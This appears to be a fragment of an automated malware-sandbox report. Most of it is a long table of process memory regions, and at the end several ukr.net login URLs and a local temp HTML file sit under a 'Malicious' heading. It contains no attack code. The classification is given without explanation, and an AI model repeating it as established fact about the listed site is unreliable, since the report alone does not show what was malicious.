7CF0000
trusted library allocation
page read and write
2B3B000
heap
page read and write
D9406FB000
stack
page read and write
4960000
heap
page read and write
289B28CD000
heap
page read and write
79E0000
heap
page read and write
7B50000
trusted library allocation
page read and write
2908000
heap
page read and write
7A33000
heap
page read and write
51CE000
stack
page read and write
68DE000
stack
page read and write
27AD000
stack
page read and write
32B5000
heap
page read and write
7110000
trusted library allocation
page read and write
46B0000
trusted library allocation
page read and write
D9405FE000
stack
page read and write
E371D3E000
stack
page read and write
6F96000
heap
page read and write
4D70000
trusted library allocation
page read and write
6FA53FE000
stack
page read and write
7A0000
trusted library allocation
page read and write
2359000
stack
page read and write
742B000
stack
page read and write
6EE8000
heap
page read and write
7E2E000
stack
page read and write
504D000
stack
page read and write
2870000
heap
page read and write
5780000
trusted library allocation
page read and write
27AE000
stack
page read and write
C9A000
trusted library allocation
page execute and read and write
E3719FE000
stack
page read and write
6870000
heap
page read and write
EFA963E000
stack
page read and write
6F2A000
heap
page read and write
233C7C60000
heap
page read and write
27C0000
heap
page read and write
7FF838920000
trusted library allocation
page execute and read and write
DEA000
trusted library allocation
page execute and read and write
4810000
trusted library allocation
page read and write
289B61A7000
trusted library allocation
page read and write
69C0000
heap
page execute and read and write
289CCAB7000
heap
page execute and read and write
289B2A60000
trusted library allocation
page read and write
2ADF000
unkown
page read and write
7FF8387E0000
trusted library allocation
page read and write
4C60000
trusted library allocation
page read and write
19DE4490000
heap
page read and write
746E000
stack
page read and write
7ECC000
stack
page read and write
6A70000
trusted library allocation
page execute and read and write
882E000
stack
page read and write
1380000
trusted library allocation
page execute and read and write
D9401FF000
stack
page read and write
233ADA90000
heap
page read and write
2EA0000
heap
page read and write
2D45000
trusted library allocation
page read and write
7F4D0000
trusted library allocation
page execute and read and write
E50000
heap
page read and write
7BEF000
stack
page read and write
6E8E000
stack
page read and write
298D000
heap
page read and write
51AE000
stack
page read and write
6B0A000
stack
page read and write
7B60000
trusted library allocation
page read and write
7B57000
trusted library allocation
page read and write
27C8000
heap
page read and write
71CE000
stack
page read and write
4EED000
trusted library allocation
page read and write
4B0E000
stack
page read and write
2A6F000
unkown
page read and write
7A52000
heap
page read and write
7CA0000
trusted library allocation
page read and write
31D0000
heap
page read and write
EFA8FE5000
stack
page read and write
289B2A90000
heap
page readonly
E37197E000
stack
page read and write
6A0B000
stack
page read and write
2B4D000
stack
page read and write
289B4966000
trusted library allocation
page read and write
321B000
heap
page read and write
D93FEFE000
stack
page read and write
2415000
heap
page read and write
1FC000
stack
page read and write
7F50000
heap
page read and write
EFA937E000
stack
page read and write
4831000
trusted library allocation
page read and write
46CA000
trusted library allocation
page execute and read and write
289B2A80000
trusted library allocation
page read and write
E37288E000
stack
page read and write
2B6F000
stack
page read and write
233ADD95000
heap
page read and write
289B44E0000
heap
page read and write
AF9000
stack
page read and write
4DA7000
heap
page read and write
4720000
heap
page read and write
EFA947E000
stack
page read and write
7FF838A60000
trusted library allocation
page read and write
2420000
heap
page read and write
6FA5EFB000
stack
page read and write
6FA56FE000
stack
page read and write
2D40000
trusted library allocation
page read and write
289CCAB0000
heap
page execute and read and write
4C75000
trusted library allocation
page execute and read and write
6A60000
trusted library allocation
page read and write
E37173E000
stack
page read and write
72B0000
trusted library allocation
page read and write
E371EBC000
stack
page read and write
600000
heap
page read and write
2D20000
trusted library allocation
page read and write
289B5CF7000
trusted library allocation
page read and write
233ADD10000
trusted library allocation
page read and write
7FF838A90000
trusted library allocation
page read and write
EFA94FE000
stack
page read and write
280F000
stack
page read and write
289B2889000
heap
page read and write
E371C7E000
stack
page read and write
691E000
stack
page read and write
2906000
heap
page read and write
289B61D6000
trusted library allocation
page read and write
233C7B90000
heap
page read and write
295C000
heap
page read and write
7FF838816000
trusted library allocation
page execute and read and write
233ADD50000
heap
page readonly
233ADD40000
trusted library allocation
page read and write
2D5C000
trusted library allocation
page read and write
4841000
trusted library allocation
page read and write
530E000
stack
page read and write
2BF0000
heap
page read and write
6F94000
heap
page read and write
289B485D000
trusted library allocation
page read and write
EFA92FF000
stack
page read and write
CB5000
heap
page read and write
2B77000
heap
page read and write
19DE45D0000
heap
page read and write
6FDE000
heap
page read and write
51EE000
stack
page read and write
289B44F3000
heap
page read and write
7FF8387EC000
trusted library allocation
page execute and read and write
233C7B8B000
heap
page read and write
7FF838740000
trusted library allocation
page read and write
2D3F000
stack
page read and write
7C0000
heap
page read and write
7AE0000
trusted library allocation
page read and write
289C47D5000
trusted library allocation
page read and write
3242000
heap
page read and write
289CCAC0000
heap
page read and write
289E000
heap
page read and write
6F6D000
heap
page read and write
28F9000
heap
page read and write
308C000
stack
page read and write
7FF8387F0000
trusted library allocation
page execute and read and write
79E000
stack
page read and write
7FF8387E6000
trusted library allocation
page read and write
6A10000
trusted library allocation
page read and write
7A9A000
heap
page read and write
8DEE000
stack
page read and write
C92000
trusted library allocation
page execute and read and write
6D9E000
stack
page read and write
7FF838930000
trusted library allocation
page read and write
289B4541000
heap
page read and write
690000
heap
page read and write
1390000
heap
page read and write
289B290A000
heap
page read and write
4DA0000
heap
page read and write
233C7B30000
heap
page execute and read and write
53F6000
trusted library allocation
page read and write
E371DBE000
stack
page read and write
276F000
stack
page read and write
287B000
heap
page read and write
2520000
trusted library allocation
page read and write
4D30000
trusted library allocation
page execute and read and write
6C1B000
stack
page read and write
720E000
stack
page read and write
7FF838850000
trusted library allocation
page execute and read and write
27EA000
stack
page read and write
7FF83878C000
trusted library allocation
page execute and read and write
289B2AA0000
trusted library allocation
page read and write
2D40000
heap
page read and write
289C4693000
trusted library allocation
page read and write
4CBE000
stack
page read and write
DFB000
trusted library allocation
page execute and read and write
47B0000
trusted library allocation
page read and write
46A4000
trusted library allocation
page read and write
2D9A000
trusted library allocation
page read and write
526E000
stack
page read and write
4F00000
heap
page read and write
289B45CE000
heap
page read and write
2D85000
trusted library allocation
page read and write
79C0000
trusted library allocation
page read and write
7F4E8000
trusted library allocation
page execute and read and write
6D5E000
stack
page read and write
289B27E0000
heap
page read and write
7AB3000
heap
page read and write
7D10000
trusted library allocation
page read and write
6FB0000
heap
page read and write
AFB000
stack
page read and write
72C0000
trusted library allocation
page read and write
233ADC21000
heap
page read and write
87DE000
stack
page read and write
233ADBE9000
heap
page read and write
233AF61E000
trusted library allocation
page read and write
28EE000
stack
page read and write
289B28C7000
heap
page read and write
7D9F000
stack
page read and write
7021000
heap
page read and write
7FF838912000
trusted library allocation
page read and write
2D7D000
trusted library allocation
page read and write
88C2000
trusted library allocation
page read and write
6FA59FD000
stack
page read and write
7FF8389D0000
trusted library allocation
page read and write
28FE000
heap
page read and write
7D30000
trusted library allocation
page read and write
7320000
trusted library allocation
page read and write
7FF83873D000
trusted library allocation
page execute and read and write
46A3000
trusted library allocation
page execute and read and write
735E000
stack
page read and write
731E000
stack
page read and write
7FF8388F0000
trusted library allocation
page execute and read and write
4C44000
trusted library allocation
page read and write
6F83000
heap
page read and write
62C9000
trusted library allocation
page read and write
289B455B000
heap
page read and write
7DA0000
heap
page read and write
46D2000
trusted library allocation
page read and write
289CCDCC000
heap
page read and write
75AB000
stack
page read and write
7300000
trusted library allocation
page read and write
E371BFD000
stack
page read and write
288E000
heap
page read and write
7FF8388E5000
trusted library allocation
page read and write
7FF838A80000
trusted library allocation
page read and write
255DA140000
heap
page read and write
29C000
stack
page read and write
3273000
heap
page read and write
72D0000
trusted library allocation
page read and write
E3716BF000
unkown
page read and write
8CFE000
stack
page read and write
62A1000
trusted library allocation
page read and write
233ADD90000
heap
page read and write
6438000
trusted library allocation
page read and write
255DA0F0000
heap
page read and write
7FF838A20000
trusted library allocation
page read and write
E3E000
stack
page read and write
233C7B40000
heap
page read and write
2CF1000
trusted library allocation
page read and write
7FF838850000
trusted library allocation
page execute and read and write
5290000
heap
page execute and read and write
289B62A0000
trusted library allocation
page read and write
4C40000
trusted library allocation
page read and write
D93FDFE000
stack
page read and write
1370000
trusted library allocation
page read and write
7CD0000
trusted library allocation
page read and write
8910000
heap
page read and write
3140000
heap
page read and write
2AE0000
heap
page read and write
2B30000
heap
page read and write
7120000
trusted library allocation
page read and write
5220000
heap
page execute and read and write
75C000
stack
page read and write
4D58000
trusted library allocation
page read and write
EFA96B8000
stack
page read and write
7B4E000
stack
page read and write
7FF838A40000
trusted library allocation
page read and write
74AE000
stack
page read and write
2908000
heap
page read and write
46F0000
trusted library allocation
page read and write
7BAE000
stack
page read and write
289B4390000
heap
page execute and read and write
4C6A000
trusted library allocation
page execute and read and write
233ADD26000
heap
page read and write
289CCDAB000
heap
page read and write
233BF5A1000
trusted library allocation
page read and write
516D000
stack
page read and write
289B43C0000
heap
page read and write
2726000
heap
page read and write
7630000
heap
page read and write
4700000
heap
page readonly
2AD0000
heap
page read and write
23D0000
heap
page read and write
289B28E1000
heap
page read and write
6FA6000
heap
page read and write
289B453F000
heap
page read and write
320C000
heap
page read and write
255DA1FF000
heap
page read and write
469F000
stack
page read and write
233ADD20000
heap
page read and write
E371AFF000
unkown
page read and write
79D0000
heap
page read and write
7FF838990000
trusted library allocation
page read and write
7310000
trusted library allocation
page read and write
7D50000
trusted library allocation
page read and write
47AE000
stack
page read and write
2B2E000
stack
page read and write
7340000
trusted library allocation
page read and write
EFA93FD000
stack
page read and write
7FF838AA0000
trusted library allocation
page read and write
5859000
trusted library allocation
page read and write
255DA0E0000
heap
page read and write
781E000
stack
page read and write
52CE000
stack
page read and write
79A0000
heap
page execute and read and write
D9403FD000
stack
page read and write
D9400FF000
stack
page read and write
728D000
stack
page read and write
75ED000
stack
page read and write
28F0000
heap
page read and write
AF6000
stack
page read and write
19DE4570000
heap
page read and write
CAA000
trusted library allocation
page execute and read and write
11AE000
stack
page read and write
7DF4D3750000
trusted library allocation
page execute and read and write
8900000
heap
page read and write
46D0000
trusted library allocation
page read and write
EB2000
heap
page read and write
233AF5B6000
trusted library allocation
page read and write
7FF8388E0000
trusted library allocation
page read and write
77DE000
stack
page read and write
69C5000
heap
page execute and read and write
289B2850000
heap
page read and write
289CCDC6000
heap
page read and write
7D30000
trusted library allocation
page execute and read and write
C70000
trusted library allocation
page read and write
4D20000
heap
page readonly
4893000
trusted library allocation
page read and write
E37167D000
stack
page read and write
724E000
stack
page read and write
2D58000
trusted library allocation
page read and write
7C6D000
stack
page read and write
8185000
trusted library allocation
page read and write
E7E000
heap
page read and write
4C50000
trusted library allocation
page read and write
7FF838750000
trusted library allocation
page read and write
6E4E000
stack
page read and write
33EE000
stack
page read and write
4F4E000
stack
page read and write
4C4D000
trusted library allocation
page execute and read and write
52A1000
trusted library allocation
page read and write
233ADC67000
heap
page read and write
7FF838733000
trusted library allocation
page execute and read and write
686E000
stack
page read and write
6FE0000
trusted library allocation
page read and write
64E000
stack
page read and write
7CB0000
trusted library allocation
page read and write
7A1F000
heap
page read and write
4EEB000
trusted library allocation
page read and write
7140000
trusted library allocation
page read and write
9C8000
heap
page read and write
762D000
stack
page read and write
2D3A000
trusted library allocation
page read and write
29C1000
heap
page read and write
6FF0000
trusted library allocation
page execute and read and write
8C70000
trusted library allocation
page read and write
4CDE000
stack
page read and write
233BF5FC000
trusted library allocation
page read and write
DD0000
heap
page read and write
2B60000
trusted library allocation
page read and write
EFA957E000
stack
page read and write
233ADC1F000
heap
page read and write
643E000
trusted library allocation
page read and write
7FF8389E0000
trusted library allocation
page read and write
233ADC3F000
heap
page read and write
7FF838816000
trusted library allocation
page execute and read and write
7A88000
heap
page read and write
EFA973C000
stack
page read and write
879D000
stack
page read and write
62FC000
trusted library allocation
page read and write
235D000
stack
page read and write
4C43000
trusted library allocation
page execute and read and write
233AF5CB000
trusted library allocation
page read and write
5225000
heap
page execute and read and write
8B11000
trusted library allocation
page read and write
7FF8387F0000
trusted library allocation
page execute and read and write
7FF8387E0000
trusted library allocation
page read and write
2919000
heap
page read and write
7AA0000
heap
page read and write
EFA98BE000
stack
page read and write
7FF8389F0000
trusted library allocation
page read and write
289B28C0000
heap
page read and write
6A5E000
stack
page read and write
540E000
stack
page read and write
97F000
stack
page read and write
2D6B000
trusted library allocation
page read and write
EFA97BE000
stack
page read and write
3279000
heap
page read and write
4C90000
trusted library allocation
page read and write
9C0000
heap
page read and write
23C0000
heap
page read and write
2D5F000
trusted library allocation
page read and write
6EF6000
heap
page read and write
2908000
heap
page read and write
289B5366000
trusted library allocation
page read and write
289B2B00000
heap
page read and write
6427000
trusted library allocation
page read and write
289B2B05000
heap
page read and write
7FF838733000
trusted library allocation
page execute and read and write
6F4B000
heap
page read and write
289B43D1000
heap
page read and write
6EE0000
heap
page read and write
EFA983E000
stack
page read and write
7D40000
trusted library allocation
page read and write
5741000
trusted library allocation
page read and write
2D70000
trusted library allocation
page read and write
289B2908000
heap
page read and write
7FF838734000
trusted library allocation
page read and write
4C70000
trusted library allocation
page read and write
19DE4641000
heap
page read and write
6F7D000
heap
page read and write
EFA927E000
stack
page read and write
290C000
heap
page read and write
2720000
heap
page read and write
233AF5F7000
trusted library allocation
page read and write
6F9E000
heap
page read and write
695000
heap
page read and write
E371B7E000
stack
page read and write
E3718FE000
stack
page read and write
EFA95F9000
stack
page read and write
2ACE000
stack
page read and write
2840000
heap
page read and write
255DA110000
heap
page read and write
7B00000
trusted library allocation
page execute and read and write
4D1E000
stack
page read and write
7FF838A00000
trusted library allocation
page read and write
289C4640000
trusted library allocation
page read and write
289B46B5000
trusted library allocation
page read and write
3480000
trusted library allocation
page read and write
318E000
unkown
page read and write
46C0000
trusted library allocation
page read and write
6FA5BFE000
stack
page read and write
7F1E000
stack
page read and write
7FF83874B000
trusted library allocation
page read and write
6B4E000
stack
page read and write
D9404FE000
stack
page read and write
7FF8387EC000
trusted library allocation
page execute and read and write
8952000
heap
page read and write
8860000
trusted library allocation
page read and write
7FF838A10000
trusted library allocation
page read and write
2D2C000
trusted library allocation
page read and write
28B2000
heap
page read and write
7FF8387E6000
trusted library allocation
page read and write
7AF0000
trusted library allocation
page read and write
E37187D000
stack
page read and write
74ED000
stack
page read and write
476E000
stack
page read and write
2410000
heap
page read and write
512C000
stack
page read and write
7FF838960000
trusted library allocation
page read and write
19DE47B0000
heap
page read and write
7330000
trusted library allocation
page read and write
6447000
trusted library allocation
page read and write
7D40000
trusted library allocation
page read and write
289B290F000
heap
page read and write
289B27F0000
heap
page read and write
7FF838740000
trusted library allocation
page read and write
342E000
stack
page read and write
EAE000
heap
page read and write
4C7F000
stack
page read and write
2905000
heap
page read and write
233ADBD0000
trusted library section
page read and write
7A3C000
heap
page read and write
4820000
heap
page execute and read and write
588B000
trusted library allocation
page read and write
7C0000
trusted library allocation
page read and write
7FDF0000
trusted library allocation
page execute and read and write
289B28C9000
heap
page read and write
There are 660 hidden memdumps, click here to show them.

DOM / HTML

URL
Malicious
https://accounts.ukr.net/login?client_id=UqGeSNzaWtOnSS6i9Epb
https://accounts.ukr.net/login?client_id=UqGeSNzaWtOnSS6i9Epb
https://accounts.ukr.net/login?client_id=UqGeSNzaWtOnSS6i9Epb
file:///C:/Users/user/appdata/local/temp/748-929-24.html